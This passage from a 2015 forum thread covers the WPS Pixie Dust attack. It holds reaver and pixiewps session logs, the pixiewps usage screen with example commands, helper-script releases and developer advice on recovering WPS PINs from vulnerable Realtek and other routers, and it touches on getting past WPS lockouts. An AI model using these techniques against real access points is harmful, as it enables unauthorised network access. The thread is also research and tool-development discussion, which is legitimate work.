[P] PKR: 19:6c:b3:0b:98:97:39:c2:3c:a3:f9:10:02:64:d9:07:61 :23:7e:f4:71:c7:8f:c1:0e:a9:2c:47:fd:25:7b:61:92:f 7:90:fe:05:60:d6:ae:3c:8e:44:60:9f:1e:50:37:e3:5e: e5:e2:fc:b0:59:5f:37:a7:54:1a:33:63:92:ce:96:6b:9a :dd:2e:8b:cd:86:c7:1c:da:ef:45:04:be:c9:b2:0e:cd:1 4:ad:12:24:25:fb:32:b7:65:40:28:29:f8:5d:98:29:1c: 26:1b:6e:10:93:5b:7b:56:1d:4d:84:c9:0d:cb:49:ae:4f :4c:0b:5b:b8:16:80:6e:13:59:fc:52:84:f8:33:3a:49:e e:91:31:8a:a2:4e:1a:01:b2:42:3d:a1:1c:4a:64:33:ae: db:11:05:3c:39:d5:45:69:b4:b5:a6:42:6b:95:2f:3f:b6 :07:26:cb:5c:4f:dc:7f:fd:b8:f2:84:6c:5e:23:c6:e0:f d:2e:1d:fa:0a:1f:51:e1:fa
[P] AuthKey: ad:4e:14:01:53:68:1f:c9:4b:bc:c7:7d:ab:96:08:2a:03 :6d:dd:29:de:72:21:85:b0:08:a8:0b:bb:66:af:4b
[+] Sending M2 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[P] E-Hash1: b6:9a:85:cb:6d:f9:67:b7:1f:00:9a:da:58:b7:60:ab:01 :18:7e:92:5b:5a:43:64:49:6e:d9:32:46:1f:38:ff
[P] E-Hash2: ab:75:8b:80:2e:68:3f:d7:d3:01:b5:81:dc:d6:0a:1e:d4 :f0:67:d1:6d:d3:0e:be:80:9a:8f:d7:17:87:ac:2d
[+] Running pixiewps with the information, wait ...
[Pixie-Dust]
[Pixie-Dust] Pixiewps 1.1
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!

PDDSA-05.sh output:

E-Nonce: =
E-BSSID: = 00:00:00:00:A7:7C
PKE: =
PKR: = 8e:8b:95:32:8b:63:02:72:29:fc:4a:60:6f:ba:63:42:e9 :e3:f7:39:d3:86:fe:09:d7:94:22:48:5c:40:fd:17:54:f 6:30:f5:ba:84:49:4e:34:fb:34:d8:44:c5:c9:ef:bf:e4: 56:98:f8:0b:38:e4:00:39:b7:aa:75:6d:5a:77:fb:5a:eb :86:2c:86:f0:cd:44:fd:81:9d:b3:1f:e4:de:10:02:e2:0 2:40:f5:f3:72:ec:eb:b4:15:96:69:7a:54:ce:48:66:2a: 5d:3b:6d:28:82:0c:f8:58:5f:71:31:79:45:72:a7:bd:15 :89:46:ec:dc:c1:7f:a6:b5:aa:9a:51:8e:28:5d:4a:3e:8 7:27:f9:d9:e1:30:4e:44:aa:18:63:62:79:7e:a7:4f:85: 9c:e7:5e:1d:ca:e5:81:e3:04:98:94:8c:3b:8c:b0:9c:4b :05:bb:99:3e:7b:86:19:f3:e6:e7:ae:64:be:d6:13:08:d 0:9b:74:f4:b5:72:9b:62:8d
AuthKey: = 44:7a:30:93:b2:57:65:37:ed:9e:68:ce:32:68:f6:3f:6f :93:7d:cd:9c:01:fa:8a:17:0f:25:be:94:9c:fb:03
E-Hash1: = 96:0a:c7:fa:93:37:cd:7e:28:31:6f:a5:af:58:95:e7:28 :ae:c4:54:75:62:de:8e:39:34:71:0a:ea:c4:91:bc
E-Hash2: = df:67:fb:4e:b9:bb:b6:0c:82:78:80:99:7c:bb:9f:a4:b2 :4f:04:fd:e0:db:dd:32:ae:5b:f1:0a:7c:35:ae:c8

Pixiewps 1.1 WPS pixie dust attack tool
Copyright (c) 2015, wiire <[email protected]>

Usage: pixiewps <arguments>

Required Arguments:

-e, --pke : Enrollee public key
-r, --pkr : Registrar public key
-s, --e-hash1 : Enrollee Hash1
-z, --e-hash2 : Enrollee Hash2
-a, --authkey : Authentication session key

Optional Arguments:

-n, --e-nonce : Enrollee nonce (mode 2,3,4)
-m, --r-nonce : Registrar nonce
-b, --e-bssid : Enrollee BSSID
-S, --dh-small : Small Diffie-Hellman keys (PKr not needed) [No]
-f, --force : Bruteforce the whole keyspace (mode 4) [No]
-v, --verbosity : Verbosity level 1-3, 1 is quietest [2]

-h, --help : Display this usage screen

Examples:

pixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce>
pixiewps -e <pke> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce> -S
pixiewps -e <pke> -s <e-hash1> -z <e-hash2> -n <e-nonce> -m <r-nonce> -b <e-bssid> -S

[!] Bad enrollee nonce -- --e-bssid


WPS Pin Not Found.
Pixie Dust Sequences Exhausted - ending program.


This was with repeated tries, in first try not posted here i used -P in reaver, in every set it left out PKE, and Enouce...no Rnouce
I'm happy to help beta, but you should probably make your thread to troubleshoot.

mmusket33
2015-05-11, 09:26
To Nuroo:

First thank you very much for the heads up and the posted information.

It looks like another version of reaver has been released that we are not aware of. Our version does not produce R:nonce.

PDDSA-05.sh will not work with the version of reaver you have. However just as soon as we can find the new version we will add the R-nounce, correct the coding and post it. It should not take more then a day or two as the basic awk engine is in place.

MTeams

mmusket33
2015-05-11, 11:58
To nuroo:

We coded in the R:Nonce and did about an hour of testing.

This version supports the latest modded reaver program from t6_x and datahead and soxrok2212 as of 11 May 15

You can download PDDSA-06.sh

http://www.datafilehost.com/d/a30c5b3d

OR at the aircrack link in our thread above.

Please test!

Older versions of the modded reaver program are not supported by PDDSA-06.sh

MTeams

nuroo
2015-05-12, 21:25
Would be cool if pixie use cuda cores for -f option

wiire
2015-05-14, 19:21
I've updated pixiewps.

Changelog:
- Mostly fixes, there were also some leaks of memory (the cracking part was ok though, so don't worry)
- Removed "modes" from the usage screen and from the warning ("[!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data.")
- Changed verbosity from 2 to 3 by default
- Added seconds and milliseconds time prints with milliseconds precision
- Added compiling optimizations (-O3) which I forgot last time... whoops (the cracking speed should be 2x or 3x times faster with -f)

So this "new version" doesn't bring anything new.

Sorry if I miss anything, been kinda busy lately. Also, sorry if I broke again some of your scripts which use pixiewps... :p

nuroo
2015-05-14, 20:25
Hey wiire we all appreciate your work.

Can you clear up a few things for me please:

Examples:

pixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce>
pixiewps -e <pke> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce> -S
pixiewps -e <pke> -s <e-hash1> -z <e-hash2> -n <e-nonce> -m <r-nonce> -b <e-bssid> -S

[!] Not all required arguments have been supplied!

What other arguments are used?
Are their any other usage examples?

Is it necessary to try all attacks on a single data set?

wiire
2015-05-14, 21:44
Hey wiire we all appreciate your work.

Can you clear up a few things for me please:

Examples:

pixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce>
pixiewps -e <pke> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce> -S
pixiewps -e <pke> -s <e-hash1> -z <e-hash2> -n <e-nonce> -m <r-nonce> -b <e-bssid> -S

[!] Not all required arguments have been supplied!

What other arguments are used?
Are their any other usage examples?

Is it necessary to try all attacks on a single data set?

The first example is the most general and what you would normally run.

The second example only shows that you can avoid to specify the Pkr if you have selected small keys in Reaver.

The last example shows that pixiewps can also compute authkey if small key option in Reaver is selected but it needs also the BSSID of the target and the Registrar nonce. It's useful if you don't have a modified version of Reaver or Bully because you can gather that data from a capture file.

Those are the only 3 useful ways you can run pixiewps. Running the first example and adding also the Enrollee BSSID and the Registrar nonce for instance doesn't 'add anything' to the program functionality.

Pixiewps automatically tries for all modes/brands. For Realtek though it tries to bruteforce a small window of seeds. In any case if the AP might be vulnerable to that kind of bruteforce and Pixiewps wasn't able to recover the pin it'll warn you to run it again with the --force option.

NOTE: if you use small keys on pixiewps but not on reaver, then pixiewps won't be able to find the pin even if the router is vulnerable, no matter what.

Also for Realtek you shouldn't use small keys.

I saw that some guys who are posting tutorial on YouTube aren't aware of these concepts.

nuroo
2015-05-15, 00:34
Thanks for the explanations, I was unsure.

So basically use modified reaver with example 1 and avoid small keys. -f if pixie warns?

no need to try example 2 or 3 if 1 fails.

soxrok2212
2015-05-15, 00:37
Thanks for the explanations, I was unsure.

So basically use modified reaver with example 1 and avoid small keys. -f if pixie warns?

no need to try example 2 or 3 if 1 fails.

yup, and option 3 if you don't have the authkey

dragood
2015-05-15, 20:08
why not use untwister to bruteforce the seed and then from there find the pin for the currently unsupported routers?

t6_x
2015-05-16, 11:39
why not use untwister to bruteforce the seed and then from there find the pin for the currently unsupported routers?

The reason is because not supported routers use the /dev/urandom to generate the random numbers.

The Untwister, only supports basic PRNG of certain libraries (Glibc's, Mersenne Twister, PHP's MT-variant, Ruby's). These are simple and easy to crack PRNG.

But not supported routers use the /dev/urandom, which is safer and complicated to manage to find the seed.

scout
2015-05-21, 14:23
That's my first time using kali linux and this kind of tools. I have successfull retrived the PIN for a BSSID, but every time i get the PIN code for a Wifi Network, the network does not show anymore @ Wash -i interfacename. With that, i could not use reaver to retrieve the password.

I tried it 3 times, and everytime i use pixiewps, the network disappear from Wash list.

By the way, i have another doubt, i tried to send some packets to a AP and now it show as WPS Locked, but its staying in this stats forever. I tried to change my MAC address but didn't work. I must force it to reconnect right (and maybe the router is invulnerable for this kind of command)?

Thank you guys.

DetmL
2015-05-28, 04:43
Some Realtek chipsets are pretty secure I guess.

[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 00:00:3c:10:00:00:53:d4:00:00:74:ed:00:00:0c:48
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Realtek Semiconductor Corp.
[P] WPS Model Name: DG-BG4100NU
[P] WPS Model Number: EV-2006-07-27
[P] Access Point Serial Number: 123456789012347
[+] Received M1 message
[P] R-Nonce: c8:4b:9c:51:3d:52:23:df:ce:8e:18:d5:4b:89:1a:b3
[P] PKR: af:f1:92:37:1c:2a:0a:39:45:43:61:12:f5:4f:e0:17:e5 :a7:87:fd:cc:2c:e2:12:bd:ea:d3:81:f5:78:69:af:d4:6 6:92:96:1e:8a:80:1e:dc:b5:0a:78:9f:61:44:46:aa:5e: 9c:be:cd:f9:9a:52:62:c6:95:8a:e2:01:66:03:fd:9c:41 :53:b5:db:b0:09:04:01:37:6f:75:35:4b:e2:07:59:15:1 2:47:70:3b:be:5c:c4:5c:34:9a:9f:d3:cf:a6:dc:e7:fb: fa:a8:b9:7b:19:ae:6f:fd:ef:82:e1:ab:ad:00:5c:29:c7 :23:10:83:9c:cc:a5:ee:dc:ff:d1:7e:a2:21:ae:43:09:7 f:7f:13:71:52:ab:fb:f1:b7:7a:8a:8f:55:4b:d6:a9:70: de:35:d0:9a:2d:24:26:8c:08:71:a0:f4:2f:2c:96:6d:be :23:17:24:1b:fa:fd:d7:27:19:d5:37:06:c5:27:d1:70:7 d:5f:34:ea:29:c7:5e:cd:d8
[P] AuthKey: 3f:dc:87:64:38:9d:7b:fa:61:8e:c7:66:ad:5a:da:60:59 :3e:f3:c3:0b:98:24:a0:37:e7:fa:ef:7e:bc:d5:53
[+] Sending M2 message
[P] E-Hash1: 25:46:44:c3:0d:4c:ad:b9:02:34:77:47:d0:93:04:aa:18 :52:7b:87:aa:cf:74:4f:32:aa:c6:60:d9:d5:4f:6d
[P] E-Hash2: eb:64:f8:14:7c:fc:e3:ba:06:a5:e8:42:c7:36:d7:98:63 :fd:f2:f1:d6:f0:e9:8d:e9:81:2d:88:db:87:13:65
[+] Running pixiewps with the information, wait ...
[Pixie-Dust]
[Pixie-Dust] Pixiewps 1.1
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust] Time taken: 0 s 660 ms
[Pixie-Dust]
[Pixie-Dust] [!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data.
[Pixie-Dust]
[+] Pin not found, trying -f (full PRNG brute force), this may take around 30 minutes
[Pixie-Dust]
[Pixie-Dust] Pixiewps 1.1
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]

kcdtv
2015-05-28, 12:39
It looks like it uses the same PKE as the suported realtek chipset :

[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
Which chipset/model is it?

DetmL
2015-05-28, 13:06
This model is Digisol DG-BG4100NU
The E-Nonce is always generated in that format.
E-Nonce: 00:00:xx:xx:00:00:xx:xx:00:00:xx:xx:00:00:xx:xx

soxrok2212
2015-05-28, 23:36
Some Realtek chipsets are pretty secure I guess.

[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 00:00:3c:10:00:00:53:d4:00:00:74:ed:00:00:0c:48
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Realtek Semiconductor Corp.
[P] WPS Model Name: DG-BG4100NU
[P] WPS Model Number: EV-2006-07-27
[P] Access Point Serial Number: 123456789012347
[+] Received M1 message
[P] R-Nonce: c8:4b:9c:51:3d:52:23:df:ce:8e:18:d5:4b:89:1a:b3
[P] PKR: af:f1:92:37:1c:2a:0a:39:45:43:61:12:f5:4f:e0:17:e5 :a7:87:fd:cc:2c:e2:12:bd:ea:d3:81:f5:78:69:af:d4:6 6:92:96:1e:8a:80:1e:dc:b5:0a:78:9f:61:44:46:aa:5e: 9c:be:cd:f9:9a:52:62:c6:95:8a:e2:01:66:03:fd:9c:41 :53:b5:db:b0:09:04:01:37:6f:75:35:4b:e2:07:59:15:1 2:47:70:3b:be:5c:c4:5c:34:9a:9f:d3:cf:a6:dc:e7:fb: fa:a8:b9:7b:19:ae:6f:fd:ef:82:e1:ab:ad:00:5c:29:c7 :23:10:83:9c:cc:a5:ee:dc:ff:d1:7e:a2:21:ae:43:09:7 f:7f:13:71:52:ab:fb:f1:b7:7a:8a:8f:55:4b:d6:a9:70: de:35:d0:9a:2d:24:26:8c:08:71:a0:f4:2f:2c:96:6d:be :23:17:24:1b:fa:fd:d7:27:19:d5:37:06:c5:27:d1:70:7 d:5f:34:ea:29:c7:5e:cd:d8
[P] AuthKey: 3f:dc:87:64:38:9d:7b:fa:61:8e:c7:66:ad:5a:da:60:59 :3e:f3:c3:0b:98:24:a0:37:e7:fa:ef:7e:bc:d5:53
[+] Sending M2 message
[P] E-Hash1: 25:46:44:c3:0d:4c:ad:b9:02:34:77:47:d0:93:04:aa:18 :52:7b:87:aa:cf:74:4f:32:aa:c6:60:d9:d5:4f:6d
[P] E-Hash2: eb:64:f8:14:7c:fc:e3:ba:06:a5:e8:42:c7:36:d7:98:63 :fd:f2:f1:d6:f0:e9:8d:e9:81:2d:88:db:87:13:65
[+] Running pixiewps with the information, wait ...
[Pixie-Dust]
[Pixie-Dust] Pixiewps 1.1
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust] Time taken: 0 s 660 ms
[Pixie-Dust]
[Pixie-Dust] [!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data.
[Pixie-Dust]
[+] Pin not found, trying -f (full PRNG brute force), this may take around 30 minutes
[Pixie-Dust]
[Pixie-Dust] Pixiewps 1.1
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]

What it could be is that the router's time is set ahead... aka it is in the future. I forget the wiggle room that pixiewps is programmed with, but I don't think it goes into the future. I might have an older version that counts up from January 1, 1970, but it probably got erased when I reinstalled Kali... and on 10.10.4 beta my Mac kernel panics when a VM shuts down :/


This model is Digisol DG-BG4100NU
The E-Nonce is always generated in that format.
E-Nonce: 00:00:xx:xx:00:00:xx:xx:00:00:xx:xx:00:00:xx:xx

That is actually quite strange, I've never seen that before... Its always like that? The reason I ask is because before the Realtek flaw was discovered, I noticed that the PKE was static for Realtek devices (confirmed with help from kcdtv and some other users :)) which made me question Realtek's implementation. I sent some data up to Dominique and he worked his magic and got back to me right away with his findings.

--Perhaps this could mean something else....?


That's my first time using kali linux and this kind of tools. I have successfull retrived the PIN for a BSSID, but every time i get the PIN code for a Wifi Network, the network does not show anymore @ Wash -i interfacename. With that, i could not use reaver to retrieve the password.

I tried it 3 times, and everytime i use pixiewps, the network disappear from Wash list.

By the way, i have another doubt, i tried to send some packets to a AP and now it show as WPS Locked, but its staying in this stats forever. I tried to change my MAC address but didn't work. I must force it to reconnect right (and maybe the router is invulnerable for this kind of command)?

Thank you guys.

Some ISPs/Manufacturers have actually taken notice of the Pixie Dust attack and they lock WPS after 1 exchange, even if it fails. I also have a network where WPS disappears at random times and I can't figure that out. It might be that the owner disabled it in the firmware and it doesn't take effect until an attack but don't quote me on that, I'm really stumped as to why I can't figure it out. I can't even get to an M2 message...

DetmL
2015-05-29, 04:58
That is actually quite strange, I've never seen that before... Its always like that? The reason I ask is because before the Realtek flaw was discovered, I noticed that the PKE was static for Realtek devices (confirmed with help from kcdtv and some other users :)) which made me question Realtek's implementation. I sent some data up to Dominique and he worked his magic and got back to me right away with his findings.

--Perhaps this could mean something else....?
Yes, always in that format. A google search on EV-2006-07-27 shows that it's a Realtek 8186 chipset. However, I'm not 100% sure that it is the correct chipset as the router is not in WikiDevi database.

soxrok2212
2015-05-29, 12:37
Yes, always in that format. A google search on EV-2006-07-27 shows that it's a Realtek 8186 chipset. However, I'm not 100% sure that it is the correct chipset as the router is not in WikiDevi database.

You could try looking it up on the fcc database...?

kcdtv
2015-05-30, 11:00
EV-2006-07-27
That's definitely a value that uses realtek for the tagged parameter "WPS version" in the PROBES.


The E-Nonce is always generated in that format.
E-Nonce: 00:00:xx:xx:00:00:xx:xx:00:00:xx:xx:00:00:xx:xx

It looks like you used small DH key option (-S) when you ran reaver 1.5.2. Isn't it?
For successful pixie dust attack vs supported realtek chipset you need to use "normal" DH keys and shouldn't use option -S in your reaver command line
Could you send us the *.cap file with the legitimate PIN and some screenshoot from the web interface?
Can you enter the web interface with credential super:super?
Does your default PIN start with 0 ?

soxrok2212
2015-05-30, 13:14
EV-2006-07-27
That's definitely a value that uses realtek for the tagged parameter "WPS version" in the PROBES.


The E-Nonce is always generated in that format.
E-Nonce: 00:00:xx:xx:00:00:xx:xx:00:00:xx:xx:00:00:xx:xx

It looks like you used small DH key option (-S) when you ran reaver 1.5.2. Isn't it?
For successful pixie dust attack vs supported realtek chipset you need to use "normal" DH keys and shouldn't use option -S in your reaver command line
Could you send us the *.cap file with the legitimate PIN and some screenshoot from the web interface?
Can you enter the web interface with credential super:super?
Does your default PIN start with 0 ?

It's not small DH keys, those are 00:00:00:00:00....00:00:00:00:02. If I can find the time I'll take a look at it but a cap with the WPS exch age would be helpful.

soxrok2212
2015-05-30, 19:10
Yes, always in that format. A google search on EV-2006-07-27 shows that it's a Realtek 8186 chipset. However, I'm not 100% sure that it is the correct chipset as the router is not in WikiDevi database.

I just looked up the RTL8671, it is a CPU chip and not a NIC. Do you know the exact mode number of the AP and can you provide a firmware/open source code for it? Thanks.

DetmL
2015-05-31, 17:27
There is no FCC ID printed on the router. The PIN is also not printed on the router. The exact model of the AP is DIGISOL DG-BG4100NU which uses RTL8186 and not the newer RTL8671. Firmware of the router can be downloaded here https://dl.dropboxusercontent.com/u/343477341/digisol/wireless_solutions/adsl_routers/dg-bg4100nu/firmware/DG-BG4100NU_A1_Firmware_11OCT2014.zip Firmware of the chipset http://sourceforge.net/projects/rtl8186/

soxrok2212
2015-06-04, 17:52
There is no FCC ID printed on the router. The PIN is also not printed on the router. The exact model of the AP is DIGISOL DG-BG4100NU which uses RTL8186 and not the newer RTL8671. Firmware of the router can be downloaded here https://dl.dropboxusercontent.com/u/343477341/digisol/wireless_solutions/adsl_routers/dg-bg4100nu/firmware/DG-BG4100NU_A1_Firmware_11OCT2014.zip Firmware of the chipset http://sourceforge.net/projects/rtl8186/

Thanks, we'll look into it!

phoenix!
2015-06-18, 10:18
Yes, always in that format. A google search on EV-2006-07-27 shows that it's a Realtek 8186 chipset. However, I'm not 100% sure that it is the correct chipset as the router is not in WikiDevi database.

Hi, @DetmL, @soxrok2212,
I ,recently came to know about the vulnerabilities of Realtek and other chipsets and thought to check if my router was vulnerable and ran reaver with pixie dust mode -K 1
where I got to know that the model number EV-2006-07-27 belongs to RTL8671 chipset(D-link router).

However I'm getting that

"WPS pin not found"

The output is given below:

[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 7b:37:51:7f:6c:c7:a8:0b:27:e9:a1:f8:5b:88:b5:40
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Realtek Semiconductor Corp.
[P] WPS Model Name: RTL8671
[P] WPS Model Number: EV-2006-07-27
[P] Access Point Serial Number: 123456789012347
[+] Received M1 message
[P] R-Nonce: c2:ed:e2:d6:80:81:48:fd:7e:13:7b:d2:3e:6c:a0:98
[P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:02
[P] AuthKey: ef:eb:93:91:fc:f0:16:3a:3e:b4:fe:dd:8f:b6:a8:fe:a6 :6a:7e:70:55:e5:20:78:c4:3a:c5:55:66:60:be:d0
[+] Sending M2 message
[P] E-Hash1: be:74:91:eb:c3:38:e0:59:7c:e1:de:5c:07:d5:1b:d3:d7 :e6:15:9e:06:09:96:f9:7c:08:4a:84:cc:df:35:0e
[P] E-Hash2: 90:bf:2e:36:f0:65:0e:f6:41:e7:97:f8:71:02:8b:11:92 :c1:89:f1:99:63:2b:fa:01:12:6c:c5:04:b6:ec:cc
[Pixie-Dust]
[Pixie-Dust] Pixiewps 1.1
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust] Time taken: 3 s
[Pixie-Dust]
[Pixie-Dust] [!] The AP /might be/ vulnerable to mode 4. Try again with --force or with another (newer) set of data.
[Pixie-Dust]


So I ran pixiewps seperately instead of reaver and it is giving me a strange error :

[!] Bad enrollee public key -- d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:

I don't know what it means.
I hope you'd shed some light on that and help.... :)

soxrok2212
2015-06-18, 14:02
Hi, @DetmL, @soxrok2212,
I ,recently came to know about the vulnerabilities of Realtek and other chipsets and thought to check if my router was vulnerable and ran reaver with pixie dust mode -K 1
where I got to know that the model number EV-2006-07-27 belongs to RTL8671 chipset(D-link router).

However I'm getting that

"WPS pin not found"

The output is given below:

[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 7b:37:51:7f:6c:c7:a8:0b:27:e9:a1:f8:5b:88:b5:40
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Realtek Semiconductor Corp.
[P] WPS Model Name: RTL8671
[P] WPS Model Number: EV-2006-07-27
[P] Access Point Serial Number: 123456789012347
[+] Received M1 message
[P] R-Nonce: c2:ed:e2:d6:80:81:48:fd:7e:13:7b:d2:3e:6c:a0:98
[P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:02
[P] AuthKey: ef:eb:93:91:fc:f0:16:3a:3e:b4:fe:dd:8f:b6:a8:fe:a6 :6a:7e:70:55:e5:20:78:c4:3a:c5:55:66:60:be:d0
